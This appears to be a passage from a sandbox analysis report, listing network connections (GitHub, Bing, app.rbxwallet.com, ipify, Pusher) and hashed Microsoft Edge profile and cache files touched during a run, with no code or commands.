| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.116.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 216.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| GB | 2.16.153.224:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | tcp |
| US | 8.8.8.8:53 | 134.252.19.2.in-addr.arpa | udp |
| GB | 2.16.153.206:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.16.153.206:443 | r.bing.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.rbxwallet.com | udp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 8.8.8.8:53 | 101.189.13.3.in-addr.arpa | udp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 173.231.16.77:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | js.pusher.com | udp |
| CZ | 65.9.98.70:443 | js.pusher.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ws-us2.pusher.com | udp |
| US | 3.20.94.118:443 | ws-us2.pusher.com | tcp |
| US | 8.8.8.8:53 | 77.16.231.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.98.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.94.20.3.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| US | 3.13.189.101:443 | app.rbxwallet.com | tcp |
| GB | 2.16.153.206:443 | www.bing.com | udp |
| GB | 2.16.153.206:443 | www.bing.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 2.19.252.134:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 38f59a47b777f2fc52088e96ffb2baaf |
| SHA1 | 267224482588b41a96d813f6d9e9d924867062db |
| SHA256 | 13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b |
| SHA512 | 4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b |
\??\pipe\LOCAL\crashpad_2788_OKINJYMZGPUGNRTJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab8ce148cb7d44f709fb1c460d03e1b0 |
| SHA1 | 44d15744015155f3e74580c93317e12d2cc0f859 |
| SHA256 | 014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff |
| SHA512 | f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bd78858a8f82db8765484f24bb9a0da3 |
| SHA1 | 938a3de5fbc571f78fec57a0dede6a40efc2816e |
| SHA256 | 4c0b855e97328e9260804d81b255d987511630a138eb89b464adf84b757fd8c9 |
| SHA512 | 015de88d480dd9a0e61d9a89d794b0f860e9adf51f3a90844279c6d8554a390449e515c4ad5fd758db701df564175df920bfbeb716d1a66e69bbbd67859ec342 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | e7226392c938e4e604d2175eb9f43ca1 |
| SHA1 | 2098293f39aa0bcdd62e718f9212d9062fa283ab |
| SHA256 | d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1 |
| SHA512 | 63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 01dc843ae776665c894d0a2a21f1056b |
| SHA1 | a1e97d872021f0511353075b456a93d1c29bb842 |
| SHA256 | 2c7d78f029b9ff065e34822ef20f150063b40386ee2a91d149f9491e67403ae6 |
| SHA512 | 232f02bcb125e39f7975295dc56a20352ff705f567fd504cb507c877db9ee71512ef106b748de33fa44b17f3d443e6840fd46e38a2d091368bb38b1a94f72ba3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba22992de266ee4eacadc337f7cdc9ca |
| SHA1 | 59ef27fb5f611c3f73b01a46159555d40b05ad09 |
| SHA256 | 065206f9810f08b990a7c0a31f8079eedb50b476a74bf57afa49f7ec1a4b110e |
| SHA512 | dbf55ef6b6da8cddd262b629fdf0a20de78d97719cfdad517a1817ae36022ce5a91e6f5265dd143c7a61c6b7e8ec9bc4e628982dab5bbb904dfbe3ffad5a8868 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | c594a826934b9505d591d0f7a7df80b7 |
| SHA1 | c04b8637e686f71f3fc46a29a86346ba9b04ae18 |
| SHA256 | e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610 |
| SHA512 | 04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fe8c349e90f50b6192e6e984324749c5 |
| SHA1 | 18b3e5d58260448a72341e2cf7611bd159422f60 |
| SHA256 | 240a2494d7171b837478abfd58171a28238a24b6dc14dbe787f7ccba14e00913 |
| SHA512 | eace4312c4e88b4c967861219d0b6be4911934fb424fcf6b088bce82d83cebfc3af6449bdb0478210f70ae9c27ec0aa769d9c4a551f7053c14d48c1d6fdd08c7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c94a44697c892cc524b00724a24d0674 |
| SHA1 | 32b3b3445cf3fd90ae155d9506343a06104f95c8 |
| SHA256 | c8bd64adb50ee63d2ef5185d26625d90e25c27ae4e5a0c32b9dc4bc2be70c7d0 |
| SHA512 | b1a6caa524ca71cee7d6f94f25b6531d42b4d1ea9891fe481b06965e9ea5d48d732f017cfdbc65cec8839bd6c4bec5e33f4048f1e9077cad68a292838935ec34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b9a3a6c5e652add99acc8214ca2fe5ba |
| SHA1 | db848e215a3c8786b672d3d50bae487c3ed7ac92 |
| SHA256 | b1bbcfd9aa00d7bf6f340dffced61c5ce748d446c37466edcaad77f9c3d53d7d |
| SHA512 | 9b64c9bc2965ab06dc593f0e828d40d27413fe357638a01e6c8fc9d2782346f370059f61581a08fd6e098ab3269109e5e20fe46f834d580fc5ad3b12f4ce7f87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a5ccd247e594ea1cde85f2da1e768a19 |
| SHA1 | 4de9a93c2a1fc206248a39b5e00c603a524d0033 |
| SHA256 | 63e07829c6d36e92dbc67392b73151ac8f544978f14588c4a9e5b1671d1bab7d |
| SHA512 | 770557e6dbc87b2b4fb7cb9db025b4553263f2c07263959531a9ee058744393b8f8aa29f5999bf391045445c986c5c8295bde9ac3d5cd79b08cd570dd4b6ca46 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c24d50e76aa15dec0e1de88032cefae3 |
| SHA1 | 5f6b3275ad8bea379b7ef10d5a7c0ccd5354e948 |
| SHA256 | 2093404daf930746601522b364af4e927669891e2a5d2a7c5ff595d4f0127eaf |
| SHA512 | b67c8f634f467c64e1440a37f951dcd2bd87f49e9b3da9be65ba61a69a2ef09e3f2f850579861f5fd327465ebaa85d32c6156b692c11a5d463567289d510142b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | a089295d641fb12177c0c486d94c2cce |
| SHA1 | ecf593369334fa5ae6b13f497c3615a850bc9b07 |
| SHA256 | 47ebe46170da3c970620959d56dc767e7a7713d756af91e13f7dffdc649a0812 |
| SHA512 | 353ac0cc4ef120d01edcabd8710621e941f8a2f7d019a62d057ab1cf5c1ed7c9b7b2160300d06f2a6923dffb0e7e16c46f804a23e07b8fc73ede06eb8c007b24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5899d666a9553875e560736fc5ff8894 |
| SHA1 | 06a530b8b9404df3b52315815b80af0a222a3c91 |
| SHA256 | 85055c0c1b39e44fcb9bd38185af77cfbb8e105d0b5b0ac1496ceadabe622ab1 |
| SHA512 | 980553c6146a211b4779b4ff14ca36a91117b08138c6adcc5bbae3b67500f043d07c745e8ba0571a195b660e26c0157f5834f5f06ca676fff7225a68b3c93c40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | 1104edecc99cf33e78867584dc05b92e |
| SHA1 | 84fc4330ad38daea5da311b8d74a9bafc242a4c3 |
| SHA256 | 43dda84aa89368aa5c8210ef3e60b9fc0f31e3f94b23bdba1a9bf051a4382afe |
| SHA512 | c7f6455f41e1ed2abed4e99101a7672dde2cb88384161be4999f2529a61cb7e0aea7f3c7579d8eea78ea02c71bd498ce268a2ce480d1db60442dc5029d266e55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 5e5e83809e999343bf8e964ce386968f |
| SHA1 | f8cdf3f9440120f57ab21b44fd17b46791269e0c |
| SHA256 | 1cdf3fffd4163b75fb025006eaf8ff066859786cb3fbe27ecd45f131480c957a |
| SHA512 | 01d9376cfe49389fd6130fd2367527dfc75662de77e1122f79d1d48843cd31bab1f06f1d20990cdb78cbb924d3bceed9d9f81d30b17bef6980cef430f3b27c80 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
| MD5 | bd0e887dd5d307044a4c32e866fdc93f |
| SHA1 | 798697e39a35481d3ee874d8817ff52370d190ec |
| SHA256 | 9d2be4f318323a6ad188dcde31ee954487972ebe8c79641dbad18ea8133e6d91 |
| SHA512 | 27b6aa3acaa43361c95201a89f8f668de1756493eef08c95802e3e4e66f0f0f0b86c8718b6bc61e7f3f6071962782f1566fe78083dd6bac68a206ffcd7c123ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 9cc9a6e31c74da9fde613ddbbd7403ff |
| SHA1 | 15acac372973ea08cf713f5c90afb6be4c64361f |
| SHA256 | 72daba8aa251085659f150e5e9205db9e807fb53522ed23a31ad9b61da4fea6f |
| SHA512 | ff7234db4ef6c5a387170ef2bc0c237bfcf4ed821c69fd06c721d3a507cc7a20e86e223f8b73dbc47dc97f2de75843243e27e0eeb6b4fcc8f891a7dfee88ba65 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 644c353907f166e9de9e628ef30cf2ba |
| SHA1 | ae2d1b6b3fe92eaaee4d7bdb4b241bf3a41e9685 |
| SHA256 | 19827fe58521558bacc0736203e57879d5d349706255456c293aab16d7739211 |
| SHA512 | aa79ff45ce1c28834a6445bd823e1871cd4c8f356c0b3256e289a2c23fc4e75203a1295ca660c42f11a8f37247bde2004229f667688012ac07b0e681143e06fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 24b25e6b0ec372fb8988320741c56b23 |
| SHA1 | 70f398739ffc27e0c7648998b4c05b8bb3cb3313 |
| SHA256 | e4a7871aa6f0d32e9fa41579d4ef041a1e2ff821880e06f9c57a1d11674c6973 |
| SHA512 | f6cf3bbb3996837e9dbc262f0a922167e01b2f6901c8d0d0706716af9c42bac5920f481a66bd7fe361a2152d08da7199fa0c319f7dbce5fab8ff67238225ddc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13369538755321311
| MD5 | 05c336f936d0ba58457fd67b4898a337 |
| SHA1 | 873a9450e747d36de1590d04c2870b6bd6397656 |
| SHA256 | 39022707433f94e7930e8c3a045d6ab447e56d004652d1f576277b48a818a9a9 |
| SHA512 | 62a6816d5aabeb038b147eb95b8e90b51c9da9ef7436028d43fc1a9650ab65b2c570f1df59c86ee1a86683afa367a16cac609bc08d5edbbf7ef02d87deefc913 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
| MD5 | 23ace7a391c2ec5ca13f34667fe05068 |
| SHA1 | 7faf3d61ee469120265dde6729234c782b644fa0 |
| SHA256 | 0ac297f1d12c1da4cce37e1799bf67eab32b88e9f152e568d458b9d647a8e3c9 |
| SHA512 | 6e18b8a0d84d8644203aeae48f05d90956f3f5e8811c35d5fac8f01b31d83ee25969ff043838117827dfd75380201068c2a1096be0325dadd0de7e479b7fbb89 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 325c75f2a6689ee5e367d632d58c2318 |
| SHA1 | bc599e6e17363d421d953494017ca318dbe03b09 |
| SHA256 | edfa3ab196b7aaf08d6a87a340f44a23b803cffd9370e3b4a8876881e5bb5d72 |
| SHA512 | a0caed3fad3d7596b4301f7ef7175af21928cfe3da5f28cbcf51ea7509980ee8b4d79c41c749f9196e4b3c96379cad21378e29f2bc77571e2feb034af6d577ce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
| MD5 | 3bdde754a9572a36b7b8273e9c015ae2 |
| SHA1 | 5df72fa35636bf39748aab50a7e526a78116b7b8 |
| SHA256 | 766672fd30217b4f9229185827528567eb73e0817500ac4e12af6e357a7309b1 |
| SHA512 | 3022f90d885d69d1d5f4a5cc672c34a2de4cd16e4e418c5c4a2ec258fb48eb6be548df6765d02ee6baec1d887a91edaf69c1916e9158d09cc2fe9a67a45d4818 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 48657442463db0e148fffc92e53310b6 |
| SHA1 | 0956030b2c57d0f9dbc9b0ca0eb652b48c261568 |
| SHA256 | 6669f33fa46ed3738d9eb08ccb31083fbbe3e488170182fec14b5300337644a4 |
| SHA512 | 4908aa082219ee45459c8e2bfdaa85467b22112244a2e31ee24c57c3a7ab68b265834d5a129ac310e3a498ba9f2ef5e2282bc1965f4c97200ce09703785043a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
| MD5 | 8f4b54652c9a9777d5fe4d144e693714 |
| SHA1 | ac1e86f36f20ccdabf7cc6b3635bbacacd098af8 |
| SHA256 | fd8b34cb0500f692fc75aaf7cb87d73fda1edd79f1a99b0244fc46286d10513f |
| SHA512 | 9b1b446a87dc94d03c76f919e2a9a7d4d4126a1b6a2f28a97c0d9156ebcf84561b919942c6650cba4512ef7b9971774e91ca2b72cd81cbf79ae76f9f19052498 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | 798cda77530e176b875302e0f5103b96 |
| SHA1 | 31938cc1eb44e19bc9d9fd789f35b97f91fef145 |
| SHA256 | c1de52c616a1116ae1503f672e63248a9076c182438abf97156bc7ef624d7d61 |
| SHA512 | 518404e251927e7fed90122ac144ba8385fcb8c6a6d5be82c3d40391658e8e18d1f5157fa2d94e3219469e1bba0afbb9a2790fd74e865318c16710ce32bbb6b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | c5603f5bf87f4df9aaa6fc6343f85e6d |
| SHA1 | e08caf0c2a5fee95641f5380179a429b0cc2ba12 |
| SHA256 | 1e807e00876c9343f65318d47fcde7768b751f4472b7844597a8073d49e00685 |
| SHA512 | b514243d3d0034f76f8bf14d693588607c43cc90472ea2bde8d9ae1239c6f283ca8dfd37d0bed3447cc1e857efba6a2c274f0b5d1eaf73289d909a7b478ea45f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dc11fc25e8715e55cf134ff5675d132d |
| SHA1 | 770e159204e08ad02ce23500b4b8493d97fdc358 |
| SHA256 | fb0c2eaa3f9ff9f6205f480c4ff60c0e123a61feae1fb2277bcd5686a476e43e |
| SHA512 | dac524ad54981f0c6c09764a27a46bcd2ec7187ebf15af08d4333b406d31930d9fd18e43722f1b672e6303074e1e02a4d41f1f97ed3e4331481dfe931467cd52 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | 9b51c0fa57d2ef86167c4ca79c5bfd74 |
| SHA1 | d2eb75d2191fcc10455cf0db7c18e396c7bdc665 |
| SHA256 | 9cbe9c0b1ba4ec42c06cf9ffc226d3fc3346f0e97f152cdfc353bc17ac46e921 |
| SHA512 | 647e5b25321d89cef7890a2f92a7fa6cbfdac8d5dd668cfb09dc2092f891d5bb4ffe89720d91dd0d77345aeee14c5c112a08ec7b7f9bdf427ba58b64e8f3e9df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
| MD5 | 44f987cb71ee5e556f3ad69f0618a24d |
| SHA1 | d1c0fb5a17df929ac895c63de80a8246b85d7b0c |
| SHA256 | 12010dc6bbe63ee30f7d334f161c68d8b4bdbfd499ca33370fa2e643e802be4b |
| SHA512 | 36d1fdf99376f30fa42fb9e8629b749e9ad7d1f463500695ca424c65589a5617ffd148d08c767e4ce65ec6dfc122f3ffe82ffa8160aefc55e0862c7f1693e5b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 0ea4cc9c12cf9b73c365597d5b123dab |
| SHA1 | 540b26ac15da90ad6f3db724593284e235496b65 |
| SHA256 | aa0d7173d7a9655d7ad1c46266aff0490a5befc2124a526cc90b8de24e871b60 |
| SHA512 | 8d79e74280acf4f914a330de3ebc6fe05536594da5d8e8677ab66fd9c5cde876a76c17433a6100756dd01a2afbbda21329b96ee2bcca8a2170ffd2bd99e1a518 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 57b36aff64d9b440e54bb6e7c71bcab4 |
| SHA1 | 3943f99786a2c2ad3de0723ac238547be74fd58d |
| SHA256 | b4af7250847f638441f110eecf58e6210ab503c7baa412c6d7b5181729fe8271 |
| SHA512 | 601e70ca85c4f47d012ab4384c169d0f76ee39958fd79225db769179412209ea42a42baa70fd90c3d58769cda7c32acb3bd400e1618bee683022ab724d32265a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 17b72f22a66641953238d7646c3afe91 |
| SHA1 | 83d3023ce35991cd3843fbba67fbbb4446321f53 |
| SHA256 | 1f7394b80de31ca4851721723a795ee96f1126ec34ebfa2022e763c18798e55b |
| SHA512 | f24f0fc01ca0531a1001b74fbfce6fe0bbca910e00a21f796a27be15ab7c371a2962d6faa5be290c14aed50d4346966537e468654d0e7a800ac05a2fa72a989e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | ce910393cf397228c428f55906fbceeb |
| SHA1 | f710868756c62489e225ceb8d0a7b420b8c3510c |
| SHA256 | 096f472952fe94c59ee39e99b051ece3f9915b40093e40dfe90fb844fabcf0f4 |
| SHA512 | 5acdfed756fb74bb05f2cdc5205452c3f99dd9d7155e28ba4863874e4c1b5b2ce3a39a8e9c2717d9a67dba032ef199bf45414f5b5659c23c9864c4a42be07796 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | 3aba565d8f8f14bc371f3981fea1fc13 |
| SHA1 | a7cbb52e49c14019e0d43c06f6ac08753fe4082b |
| SHA256 | c3b598d3acc012dbfc3f766bd0fcb09c68da6f2d1a9e0f4bc2ef4d1c25032f69 |
| SHA512 | 0add7790a88a0cfd3273dd18e73af7ce7a24e122f5b45948100367cae5ff2cee70b4cdd3548ace348ffd0169107294530e31e6f3ccf5860413191817e4032152 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
| MD5 | 436a5417e2d228ab79ecb5d76bd4c5c1 |
| SHA1 | 20e7f72891185af398e1d752102fb36b36fe2d17 |
| SHA256 | dc0fb52f464ebcfeb2d6566bbf169a1c6154c94f36d545a201a2ec1e7b59568a |
| SHA512 | d39283f7ed027e08f2140d9ccd30c053b564d9ef9f8de54a1b2714f6062f587a2f89303e3f5e40a042443db9f009311e165c3f8086fa0e7b6d0038070a4436fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 40a58938a068a481f1b12e6b2e18dabc |
| SHA1 | d46b88300c3013ad4ffd1042e8aabea29f60e44c |
| SHA256 | f90edce74dae64c8b9e50de603c4654311a5ba395c5eeb7f884f63a0f6af3f7d |
| SHA512 | 5b9bb175c311ec7bf58e664181840ffe2e8834f48ca0bf2acde0ad1910f6c6fc1886246439135dbfc8edfb5508c5042dbf80f2239cbe5f5c306fa547fc9bb305 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | e157172f5705c55e56f98b553622900b |
| SHA1 | 9b1380a74a8f4607dffbe2e6c37887ade235bc1e |
| SHA256 | 11714c615020f29a2dd8dbb30d8bcc2ec070a8bbb1cb8fa65cefc9e7af5b004c |
| SHA512 | b4eb085cbcd4ccdb603e50067b8b7fe3ace58c4b172fea5d8a98ec78ba183a443eba30d8d2390e2eb1b6afbf7184c68c08b6668299d73a11821a3a9c96890907 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 189183b5b70d624dee1ff176baec7928 |
| SHA1 | 00e118c4a74879d72240bbb70f9932c316118cab |
| SHA256 | bfef616036b4c66c17ef5112b1d26df8cb8ba296c0493154c61f8249c0894d56 |
| SHA512 | f3fecdd43d60114b0163a55dec2f160349f9d7e142fb86b62b0905e28135e9696ca62c7773074371d2aed234df01a930fc32121a722df2e123b70f46aa04f28c |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | f41780dc019a24d5b1e0be60cc028867 |
| SHA1 | b40e6fb37c9f2910d2bb890b5b7fb5164f68eeab |
| SHA256 | f9166c42e4dab5c62caae4c90b50ee0d97aead4e2699eb7158fe12fe958ce3d3 |
| SHA512 | 3633639a25329311d9df3b2dcd6ca32806087bda98fe48e9fdc8174cc9e591777f9b2d89b4e4e6b7bdf6c335f14c825ea390f67e49ca381ff99292403c500843 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001
| MD5 | e8e1f8273c10625d8b5e1541f8cab8fd |
| SHA1 | 18d7a3b3362fc592407e5b174a8fb60a128ce544 |
| SHA256 | 45870d39eb491375c12251d35194e916ace795b1a67e02841e1bbcb14f1a0e44 |
| SHA512 | ca77d40ec247d16bc50302f8b13c79b37ab1fcf81c1f8ab50f2fc5430d4fabc74f5845c781bd11bb55840184e6765c2f18b28af72e1f7800fe0bb0b1f3f23b24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002
| MD5 | a4e164f6a15386763f5a9915b9b2abc8 |
| SHA1 | 8d499d52070f47a4084008fcb8874fb148994d4d |
| SHA256 | dad5ddc6868717a6c955e0c7627f0f93adca70d5d20733c1a98324269fa19f85 |
| SHA512 | 9ae0dc6c7638553dc8b7c99f0f0b5671901409b50c0cd7666b556a08cb979b4334cee2b10bc826a3d7ce435a84536a0e81d2fbc79104e29588c5b506da97aa0b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
| MD5 | 410d5f041f3f5f1c6dae7db822f0776a |
| SHA1 | 95b33273de19c7547e18d5e50a27b1fcca1f64ed |
| SHA256 | 6ef1b4ce8438ca449854d823cef13a1886b838e05541ee50d77edf108344a5f3 |
| SHA512 | 32c49da579cd9e2491ce349d1c8e68d28e0adb6d1598ccf67255e6740cbd543defe159d58ed2d29089804393d596ae3a5ae368007d0d38ef5f2653c753c58793 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | 21f351850c3fd57b06f1d923fd8cce37 |
| SHA1 | 44f31a1efa0d87b68373197462b3edbd65b5c2c1 |
| SHA256 | b2b03ef6a353e07d9607b1c91323e0cd99774fda229a898228a4331ff3dbf08b |
| SHA512 | ce5d8c4bd18db76e9d8019a08bbd4a9f43865f2b3ab3f59831c75eb5c7d08ba3039f18530c2b94be8263d05510d528f26573c7f4dafdd5c9f1ec14a1f18989b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
| MD5 | 7dfd25bb98e3b8220bc1647c7a48201c |
| SHA1 | aa4fdd05ca548d2939af70c9f21c34a4d3143e21 |
| SHA256 | 3fae53e5b013f912243d6b59a114ebe246a8b5489641bca448933e49a823bd55 |
| SHA512 | 5105cda03dddf7ea8a5164e99699e3775e6107df8f05a663fa7f421098a3f655a35366e04d19e84470e21fe8fb9d18a737b5ec7c9ba2b6951537daa02bc6cec5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL
| MD5 | c2710c73658cd4e317b391e1c0d3d231 |
| SHA1 | c9142de3b1d4936659cb1929611963bcd7f0ea17 |
| SHA256 | 2f9604e8ea8f052d5ba405608b8d093cfbd50101eb57139eab1c00d41866348a |
| SHA512 | f19a6943330b80e5e93c0e2593576ee26b491e8e4d2f87882e912d936cc649db1ae67b26fe4f61956626709d62c733b8c71abbdd6e438bef9693eab35ad4b519 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
